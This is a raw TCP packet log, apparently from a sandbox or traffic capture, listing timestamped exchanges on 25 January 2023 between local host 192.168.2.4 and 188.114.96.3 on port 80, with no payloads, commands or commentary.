Jan 25, 2023 09:28:21.033693075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033721924 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.033751011 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.033857107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.033898115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.034431934 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.048747063 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071393013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071429968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071456909 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071481943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071506977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071523905 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071556091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071572065 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071594000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071614981 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071633101 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071655035 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071675062 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071683884 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071702003 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071722984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071741104 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071752071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071772099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071779966 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071798086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071818113 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071835995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071846962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071866035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071878910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071897030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071913958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071923971 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071942091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071963072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.071973085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.071989059 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072006941 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072032928 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072041035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072062016 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072068930 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072087049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072107077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072118044 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072137117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072154999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072176933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072191000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072221041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072227955 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072244883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072263956 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072273970 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072289944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072310925 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072321892 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072340965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072359085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072369099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072387934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072407961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072417974 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072436094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072454929 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072463989 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072484970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072505951 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072525978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072536945 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072554111 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072562933 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072580099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072599888 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072621107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072632074 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072653055 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072664976 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072685003 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072710037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072741032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072750092 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072761059 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072778940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072799921 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072817087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.072848082 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.072880030 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073256016 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073276997 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073297024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073318005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073335886 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073348045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073365927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073374987 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073412895 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073431969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073450089 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073470116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073489904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073499918 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073519945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073539972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073551893 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073569059 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073590040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073597908 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073616028 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073633909 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073646069 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073664904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073683977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073704958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073714972 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073733091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073744059 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073761940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073776960 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073791027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073811054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073829889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073849916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073869944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073879957 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073898077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073916912 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.073926926 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.073965073 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074012995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074408054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074456930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074476957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074491024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074505091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074522972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074546099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074553967 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074573040 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074580908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074601889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074629068 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074750900 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074771881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074793100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074804068 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074821949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074836969 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074851990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074872017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074892044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074912071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074922085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074939013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074948072 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074965954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.074982882 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.074995995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075016022 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075036049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075064898 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075088024 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075375080 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075397015 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075423956 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075443029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075457096 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075474024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075496912 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075504065 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075524092 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075544119 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075556040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075575113 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075596094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075617075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075627089 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075649023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075655937 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075675011 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075694084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075712919 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075726032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075741053 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075751066 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075768948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075784922 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075798988 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075818062 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075836897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075859070 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075869083 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.075890064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.075896978 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076334953 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076355934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076375961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076399088 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076407909 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076431990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076438904 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076452971 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076467991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076488972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076509953 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076519966 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076538086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076559067 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076580048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076591015 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076608896 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076620102 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076637030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076657057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076677084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076687098 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076709986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076715946 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076734066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076755047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076776028 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076785088 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076803923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076813936 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076833010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076854944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.076884985 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.076910019 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077272892 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077297926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077306032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077325106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077344894 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077363968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077374935 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077394009 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077404022 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077420950 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077434063 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077450037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077470064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077490091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077498913 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077517033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077532053 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077543974 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077563047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077583075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077601910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077611923 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077630043 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077639103 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077657938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077677965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077697039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077707052 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077728033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077734947 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077752113 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077769995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.077800989 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.077830076 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.078011036 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.078192949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078213930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078232050 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078250885 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078269958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078289032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.078310013 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.078320980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078341007 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078361034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078381062 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078391075 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.078412056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078419924 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.078437090 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078455925 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.078481913 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.078505039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.079060078 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.079308033 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.116682053 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.116751909 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.116800070 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.116847992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.116898060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.116955996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.116976023 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.117032051 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117052078 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.117084026 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.117117882 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117166996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117187023 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.117232084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117280006 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117325068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117345095 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.117383003 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.117409945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117458105 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117506027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117552042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117574930 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.117611885 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.117638111 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117682934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117729902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117775917 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117798090 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.117842913 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.117928028 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.118072033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118129015 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118175030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118197918 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.118231058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.118266106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118309021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118357897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118405104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118424892 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.118465900 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.118489027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118532896 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118582010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118628979 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118649006 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.118685961 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.118740082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118788004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118834972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118884087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.118910074 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.118954897 CET	80	49736	188.114.96.3	192.168.2.4
